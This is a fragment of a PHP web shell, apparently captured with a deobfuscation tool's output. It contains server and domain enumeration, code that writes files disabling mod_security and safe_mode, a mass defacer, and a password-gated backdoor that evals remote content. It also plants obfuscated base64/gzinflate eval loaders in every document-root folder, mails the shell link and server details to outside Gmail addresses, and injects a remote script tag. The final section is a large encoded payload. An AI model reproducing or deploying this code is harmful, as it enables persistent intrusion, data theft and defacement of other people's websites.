{ if (is_readable(\$dirz)) { array_push(\$users,\$username);array_push(\$pub,\$dirz); }}}\$i++;}\r\necho '<font color=aqua> [-]==================[ START ]==================[-]<br></font>';\r\nforeach (\$users as \$user){echo \"<font color=#a3e956> [+] /home/\$user/public_html/</font><br/>\";} echo \"\\n <font color=aqua><br>[-]==================[ FINISH ]==================[-] <br></font>\\n\"; echo '</body></html>';\r\nprintFooter();\r\n}\r\nfunction actionSubdomain() {\r\nprintHeader();\r\nerror_reporting(0);\r\n\$user = get_current_user();\r\n\$open = opendir('/home/' . \$user . '/access-logs/');\r\nwhile (\$dir = readdir(\$open)) {\r\n\$totalDoamin[] = \$dir;\r\n}\r\nclosedir(\$open);\r\n\$total = count(\$totalDoamin);\r\n\$domain = \$total - 2;\r\nif (\$domain > 0) {\r\necho \"<h2><b><font style=\\\"color: #a3e956 ;\\\" > ~ Total </font><font style=\\\"color: #a3e956; \\\">\" . \$domain . \"</font><font style=\\\"color: #a3e956;\\\" > Sub Domain Found! ~ </font><br><BR>\";\r\n} else {\r\necho \"<h2><b> ~ <font color='red' style=\\\"color: red; text-shadow: red 0px 0px 4px ; \\\">0</font><font style=\\\"color: #black; text-shadow: black 0px 0px 6px ;\\\"> Sub Domain Found! ~</font><br><BR>\";\r\n}\r\n\$scan = array_diff(scandir('/home/' . \$user . '/access-logs/'), array('.'));\r\n\$domains = implode(\"\r\nhttp://\", \$scan);\r\necho '\r\n<style>\r\nbody {\r\ntext-align: center;\r\n}\r\n</style><textarea style=\"color: #a3e956; background-color: black\" rows=\\'30\\' cols=\\'100\\'>';\r\nprint_r(\$domains);\r\necho '</textarea>';\r\nprintFooter();\r\n}\r\nfunction actionSym() {\r\nprintHeader();\r\n\$file = @implode(@file(\"/etc/named.conf\"));\r\nif (!\$file) {\r\ndie(\"# can't ReaD -> [ /etc/named.conf ]\");\r\n}\r\npreg_match_all(\"#named/(.*?).db#\", \$file, \$r);\r\n\$domains = array_unique(\$r[1]);\r\n{\r\nforeach (\$domains as \$domain) {\r\n\$user = posix_getpwuid(@fileowner(\"/etc/valiases/\" . \$domain));\r\n\$array= \"<br>http://\$domain<br>\";\r\n\$lol= '' . get_current_user();\r\nif (strpos(\$array, \"\$lol\") == false) {\r\n\$shared = str_replace(array(\" \$lol\"), \"\", \$array);\r\necho \"<center>\$shared\";\r\n}\r\n}\r\n}\r\nprintFooter();\r\n}\r\nfunction actionBypass() {\r\nprintHeader();\r\necho '<h1>Safe Mode</h1>';\r\necho '<div class=\"content\">';\r\necho \"<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh] files create in following dir<br>| \".\$GLOBALS['cwd'].\" |<br><br />\";\r\necho '<a href=# onclick=\"g(null,null,\\'php.ini\\',null)\">| PHP.INI | </a><a href=# onclick=\"g(null,null,null,\\'ini\\')\">| .htaccess(Mod) | </a><a href=# onclick=\"g(null,null,null,null,\\'sh\\')\">| .htaccess(perl) | </a></center>';\r\nif(!empty(\$_POST['p2']) && isset(\$_POST['p2']))\r\n{\r\n\$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\nfwrite(\$fil,'<IfModule mod_security.c>\r\nSec------Engine Off\r\nSec------ScanPOST Off\r\n</IfModule>');\r\nfclose(\$fil);\r\n }\r\n if(!empty(\$_POST['p1'])&& isset(\$_POST['p1']))\r\n {\r\n\$fil=fopen(\$GLOBALS['cwd'].\"php.ini\",\"w\");\r\nfwrite(\$fil,'safe_mode=OFF\r\ndisable_functions=NONE');\r\nfclose(\$fil);\r\n}\r\nif(!empty(\$_POST['p3']) && isset(\$_POST['p3']))\r\n{\r\n\$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\nfwrite(\$fil,'Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-cgi .sh\r\nAddHandler cgi-script .pl\r\nAddHandler cgi-script .pl');\r\nfclose(\$fil); \r\n}\r\necho \"<br><br /><br /></div>\";\r\necho '</div>';\r\nprintFooter();\r\n}\r\nfunction actionDeface() {\r\nprintHeader();\r\necho \"<h1>Mass Defacer by PuNkHoLic</h1><div class=content>\";\r\n?>\r\n<form ENCTYPE=\"multipart/form-data\" action=\"<?\$_SERVER['PHP_SELF']?>\" method=POST onSubmit=\"g(null,null,this.path.value,this.file.value,this.Contents.value);return false;\">\r\n<p align=\"Left\">Folder: <input type=text name=path size=60 value=\"<?=getcwd(); ?>\">\r\n<br>file name : <input type=text name=file size=20 value=\"index.php\">\r\n<br>Text Content : <input type=text name=Contents size=70 value=\"Add your deface txt here\"> \r\n<br><input type=submit value=\"Deface now\"></p></form>\r\n<?php\r\nif (\$_POST['a'] == 'Deface') {\r\n\$mainpath = \$_POST[p1];\r\n\$file = \$_POST[p2];\r\n\$txtContents = \$_POST[p3];\r\necho \"PuNkHoLic\";\r\n\$dir = opendir(\$mainpath); //fixme - cannot deface when change to writeable path!!\r\nwhile (\$row = readdir(\$dir)) {\r\n\$start = @fopen(\"\$row/\$file\", \"w+\");\r\n\$code = \$txtContents;\r\n\$finish = @fwrite(\$start, \$code);\r\nif (\$finish) {\r\necho \"\$row/\$file > Done<br><br>\";\r\n}\r\n}\r\n}\r\necho '</div>';\r\nprintFooter();\r\n}\r\n function actionDomain() {\r\nprintHeader();\r\necho '<h1>Local Domains</h1><div class=content>';\r\n\$file = @implode(@file(\"/etc/named.conf\"));\r\n\$Domain_path = \"/var/named\";\r\nif (!\$file) {\r\n\$domains = scandir(\$Domain_path);\r\n\$count=1;\r\n\$dc = 0;\r\necho \"<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2>There are : ( <b>\" . count(\$domains) . \"</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>\r\n<tr><td>No</td><td>Domain</td><td>User</td></tr>\";\r\nforeach (\$domains as &\$domain) {\r\nif (stripos(\$domain,\".db\")) {\r\n\$domain = str_replace('.db','',\$domain);\r\n}\r\nif (strlen(\$domain) > 6) {\r\necho \"<tr><td>\".\$count++.\"</td><td><a href='http://\".\$domain.\"' target='_blank'>\".\$domain.\"</a></td><td>User</td></tr>\";\r\n}\r\n} \r\necho \"</table>\";\r\n}else{\r\n\$count = 1;\r\npreg_match_all(\"#named/(.*?).db#\", \$file, \$r);\r\n\$domains = array_unique(\$r[1]);\r\necho \"<table align=center border=1 width=59% cellpadding=5>\r\n<tr><td colspan=2> There are( <b>\" . count(\$domains) . \"</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>\r\n<tr><td>No</td><td>Domain</td><td>User</td></tr>\";\r\nforeach (\$domains as \$domain) {\r\n\$user = posix_getpwuid(@fileowner(\"/etc/valiases/\" . \$domain));\r\necho \"<tr><td>\".\$count++.\"</td><td><a href='http://\".\$domain.\"' target='_blank'>\".\$domain.\"</a></td><td>\".\$user['name'].\"</td></tr>\";\r\n }\r\n}\r\n printFooter();\r\n}\r\nif( empty(\$_POST['a']) )\r\nif(isset(\$default_action) && function_exists('action' . \$default_action))\r\n\$_POST['a'] = \$default_action;\r\nelse\r\n\$_POST['a'] = 'SecInfo';\r\nif( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) )\r\ncall_user_func('action' . \$_POST['a'])\r\n?>\r\n<?php\r\n@session_start();\r\n@error_reporting(0);\r\n\$a = '<?php phpinfo();\r\n\r\n\$gz = \"ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==\";\r\n\$gzinflate = \"=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA\";\r\neval(htmlspecialchars_decode(urldecode(base64_decode(\$gz))));\r\n?>\r\n\r\n';\r\nif (@\$_REQUEST[\"px\"]) {\r\n    \$p = @\$_REQUEST[\"px\"];\r\n    \$pa = md5(sha1(\$p));\r\n    if (\$pa == \"013f0a41203c0ad0f68033f4a53c7e6d\") {\r\n        echo eval(@file_get_contents(@\$_REQUEST[\"404\"]));\r\n    }\r\n}\r\nif (@!\$_SESSION[\"sdm\"]) {\r\n    \$doc = \$_SERVER[\"DOCUMENT_ROOT\"];\r\n    \$dir = scandir(\$doc);\r\n    \$d1 = '' . \$doc . '/.';\r\n    \$d2 = '' . \$doc . '/..';\r\n    if ((\$key = @array_search('.', \$dir)) !== false) {\r\n        unset(\$dir[\$key]);\r\n    }\r\n    if ((\$key = @array_search('..', \$dir)) !== false) {\r\n        unset(\$dir[\$key]);\r\n    }\r\n    if ((\$key = @array_search(\$d1, \$dir)) !== false) {\r\n        unset(\$dir[\$key]);\r\n    }\r\n    if ((\$key = array_search(\$d2, \$dir)) !== false) {\r\n        unset(\$dir[\$key]);\r\n    }\r\n    @array_push(\$dir, \$doc);\r\n    foreach (\$dir as \$d) {\r\n        \$p = \$doc . \"/\" . \$d;\r\n        if (is_dir(\$p)) {\r\n            \$file = \$p . \"/style-js.php\";\r\n            @touch(\$file);\r\n            \$folder = @fopen(\$file, \"w\");\r\n            @fwrite(\$folder, \$a);\r\n        }\r\n    }\r\n\r\n}\r\n?>\r\n<?php\r\n\r\n\$ikrhtfy = \$_SERVER[\"DOCUMENT_ROOT\"].'/'.'phpinfo.php';\r\n\r\n\r\n\$fghky_ouvcbt = '<?php phpinfo();\r\n\r\n\r\n\$gz = \"ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==\";\r\n\$gzinflate = \"=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA\";\r\neval(htmlspecialchars_decode(urldecode(base64_decode(\$gz))));\r\n\r\n?>'; \r\n\r\n\r\n\r\nif (!file_exists(\$ikrhtfy)){  \r\n   \r\ntouch(\$ikrhtfy); \r\nchmod(\$ikrhtfy,0666); \r\n   \r\n} \r\n\r\n\$opazxcdnm = fopen(\$ikrhtfy,\"w\"); \r\n\r\nif (!fwrite(\$opazxcdnm,\$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n\$b = \"Soldier'ss\";\r\n\$c = \"Dosya Yolu : \" . \$_SERVER['DOCUMENT_ROOT'] . \"\r\n\";\r\n\$c.= \"Server Admin : \" . \$_SERVER['SERVER_ADMIN'] . \"\r\n\";\r\n\$c.= \"Server isletim sistemi : \" . \$_SERVER['SERVER_SOFTWARE'] . \"\r\n\";\r\n\$c.= \"Shell Link : http://\" . \$_SERVER['SERVER_NAME'] . \$_SERVER['PHP_SELF'] . \"\r\n\";\r\n\$c.= \"Avlanan Site : \" . \$_SERVER['HTTP_HOST'] . \"\r\n\";\r\nmail(\"hacklinksatis@gmail.com\", \$b, \$c);\r\nmail(\"burdayimreis@gmail.com\", \$b, \$c);\r\necho \"<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>\";\r\n?>\r\n");
exit;
Execution traces
Generated HTML code
<html style="height: 100%;"><head><meta name="viewport" content="width=device-width, minimum-scale=0.1"></head><body style="margin: 0px; background: #0e0e0e; height: 100%"><img style="display: block;-webkit-user-select: none;margin: auto;background-color: hsl(0, 0%, 90%);transition: background-color 300ms;" src="http://localhost/w3.jpg"></body></html>
Original PHP code
<?php
$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=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